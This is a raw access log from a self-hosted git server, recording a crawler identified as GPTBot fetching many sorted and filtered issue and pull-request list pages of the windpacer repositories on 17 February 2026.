"https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10085] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:10:44 +0000] - 